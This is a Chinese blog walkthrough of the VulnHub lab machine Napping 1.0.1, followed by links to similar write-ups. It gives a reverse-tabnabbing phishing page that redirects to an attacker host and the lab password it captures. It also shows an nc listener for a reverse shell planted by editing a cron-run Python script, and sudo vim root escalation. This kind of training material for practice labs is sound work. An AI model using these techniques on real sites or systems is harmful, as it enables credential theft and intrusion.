Vulnhub靶场:NAPPING: 1.0.1

于 2024-06-05 19:00:00 发布
阅读量1.2k 收藏 17
点赞数 40
文章标签: 网络安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69670995/article/details/139467088
版权

1.环境搭建

靶机下载:Napping: 1.0.1 ~ VulnHub

将靶机导入到Oracle VM VirtualBox中,网络设置仅主机模式,和kali使用相同的网卡

开启靶机

2.渗透过程

使用nmap工具扫描进行主机发现扫描

nmap -sn 192.168.56.0/24

发现靶机ip地址,使用nmap工具进行端口扫描

nmap -sS 192.168.56.121

发现22端口和80端口,使用浏览器访问80端口

发现是一个登陆页面,首先进行注册

点击按钮进行注册,用注册的用户名和密码进行登陆

登陆成功发现有一个输入框,查看一下网页源代码

发现一个a连接,输入一个url再次查看网页源代码

发现a连接出现了刚刚输入的url,猜测这是一个社工,可以写一个钓鱼页面,新建一个b.html文件,将下面的代码写入

<!DOCTYPE html>
<html>
<body>
    <script>
        if(window.opener) window.opener.parent.location.replace('http://192.168.56.101:7777/a.html');
        if(window.opener  != window) window.opener.parent.location.replace('http://192.168.56.101:7777/a.html');
    </script>
</body>
</html>

然后新建一个a.html文件,下面代码写入(写一个正常的页面就行)

<html>
        <body>
                aaa
        </body>
</html>

kali监听7777端口

nc -lvp 7777

kali开启临时http服务

python3 -m http.server 8000

在页面上提交恶意页面连接

http://192.168.56.101:8000/b.html

稍等一会返回用户名(daniel)和密码(C@ughtm3napping123)

利用用户名和密码进行ssh连接

ssh daniel@192.168.56.121

连接成功,查看用户所在的组

id

查看该组可以执行的程序

find / -group administrators 2>/dev/null

查看py文件

cat /home/adrian/query.py

发现它向site_status.txt文件写入东西,查看该txt文件

cat /home/adrian/site_status.txt

发现该py程序每两分钟执行一次,这里在用户的家目录下新建一个shell.sh文件

修改py文件

import os

os.system('/usr/bin/bash /home/daniel/shell.sh')

使用kali监听6666端口,然后等到py脚本自动执行

nc -lvp 6666

反弹shell成功

开始提权

sudo -l

这里使用vim提权

sudo vim -c ':!/bin/bash'

切换交互模式

python3 -c 'import pty;pty.spawn("/bin/bash")'

提权成功

进入root目录,查看文件

GJyt
关注
  • 40
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Matlab:正则表达式中的标文
希望我的博客,能帮上你解决学习中工作中所遇到的问题
11-16 173
Matlab:正则表达式中的标文
深入浅出matplotlib(82):分类变量直接可视化
大坡3D软件开发
02-24 416
数据的分类显示,很多场合都会使用到,比如目前火热火热的机器学习,就需要大量地进行分类,当测试结果出来时,就需要可视化,那么这时就要使用matplotlib来显示了。而matplotlib里,函数有一种功能特别适合分类显示。如果有一班学生,期末考试了,老师要看一下整个数学成绩的分布情况,就可以把学生的名称放到一个数组里,然后把学生对应的数学成绩放到另外一数组里,最后把这两个数组直接丢到matplotlib里的函数就可以显示出来了,它会在x轴显示名称,在y轴显示成绩。 下面来演示一个例子,假如去超市购物.
4-vulnhub靶场,napping
qq_49078152的博客
08-21 416
vulnhub靶场,napping,vim提权,2>/dev/null过滤
Vulnhub_Napping
qq_45434762的博客
02-13 3346
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
VulnHub-Napping打靶记录
qq_43534481的博客
08-24 324
Vulnhub Napping靶场 详细通关记录。
Vulnhub项目:NAPPING: 1.0.1
最新发布
Ays.Ie的博客
05-07 772
Vulnhub项目:NAPPING: 1.0.1
Vulnhub靶场】NAPPING: 1.0.1
DG_s1mple
04-01 6178
环境准备 下载靶机导入到vmware 攻击机IP地址为:192.168.2.18 靶机IP地址为:192.168.2.16 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务 我们首先访问一下他的http服务 是一个登录界面,并且可以注册账号,我们先注册一下 有一个文本框,我们测试一下功能 发现我们输入什么网站,他就跳转到什么网站,这么会存在Tabnabbing攻击 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面
napping-player:适用于 Android 平板电脑的视频播放器,可进行“小睡”实验
06-29
打盹儿 这是一款适用于 Android 平板电脑的视频播放器,可以进行“小睡”实验。 什么是午睡实验? 来自 Nestrud、Michael A. 和 Harry T.... “从 MFA 和 MDS 的小睡数据中恢复子采样维度和配置。...
NAPPING
10-24
标题"NAPPING"可能指的是一个与字体设计或者艺术相关的项目,因为"字体"是给定的标签之一。在IT行业中,字体通常涉及到用户界面(UI)设计、网页设计、图形设计等领域,是信息传达的重要组成部分。字体的选择和设计...
如何删除导入napping
05-26
如果您想删除已导入的Python模块`napping`,可以使用以下命令: ``` pip uninstall napping ``` 这将从Python环境中删除`napping`模块及其依赖项。请注意,您需要在命令行中执行此命令,并确保您具有足够的权限来...
vulnhub靶场6:napping
Genarior的专栏
05-16 201
8、find / -group administrators -type f 2>/dev/null 查看有相同权限的文件 ,发现了一个query.py。6、启动python3 -m http.server 80 监听,同步nc -lvvp 8000端口监听,获得了账号密码。10、获得反弹shell,查看sudo可执行命令,可以无需密码root权限执行vim。使用sudo vim 修改/etc/passwd文件添加用户。13、使用sudo vim修改/etc/shadow文件。7、ssh登录,查看权限。
vulnhub——napping-1.0.1靶机
Re1_zf的博客
11-01 1223
首先,创建一个反弹shell的sh文件,这里需要注意路径需要在当前用户目录下,否则没有权限创建文件。大概内容就是只要本地web服务可以正常访问,就每隔两分钟向日志文件中写入当前时间。修改一下py执行文件的内容,使其执行编辑好的反弹shell的脚本。这样的话,借助这个py文件,我们可以尝试向攻击机反弹shell。等待一会儿后会有一个shell反弹过来,同时查看一下权限。这里需要注意一下,返回的数据包需要进行一下URL解码。看一下这个目录下的执行日志,大概就是两分钟执行一次。查找一下这个组有权限运行的程序。
Vulnhub靶场】Napping 1.0.1
Nailaoyyds的博客
06-15 961
查看开启端口和服务,登录框可以从弱密码、注册口,子目录,注入等手段入手。 注册账号试试水 登录后发现有跳转点,可以跳转到输入的链接。 先看一下正常链接,发现是可以执行的 利用恶意链接 直接用kali访问该页面。 监听到账号密码 query.py这个py文件是可以执行的,可以在里边写入反弹shell。建立shell文件,导入py文件中执行。文件差不多两分钟自动执行一次。 给shell.sh文件权限。..................
napping靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-04 503
napping靶场渗透记录 Even admins can fall asleep on the job
Vulnhub 靶机 Napping 1.0.1 write up Reverse Tabnabbing钓鱼 修改root权限的定时py文件 + vim 提权
YouthBelief的博客
01-12 1668
0x00 环境准备 下载地址 https://www.vulnhub.com/entry/napping-101,752/ 靶机介绍 Name: Napping: 1.0.1 Date release: 22 Oct 2021 Author: hadrian3689 Series: Napping Description Even Admins can fall asleep on the job 虚拟机 Virtualbox 仅主机 kali也用该网
VulnHub渗透测试实战靶场-HA:NARAK
LYJ20010728的博客
08-20 839
VulnHub渗透测试实战靶场-HA:NARAK环境下载HA:NARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HA:NARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.140 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
渗透测试学习之靶机napping-1.0.1
xdbzdgx的博客
04-30 1188
前期准备 1.下载靶机Napping-1.0.1WebGOAT: 1 ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.129 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- 192.168.88.129 发现开放了80端口和22远程控制端口 2.寻找web信息 访问后发现需要登录,随即注册账号并登录。 此处..
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8429
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值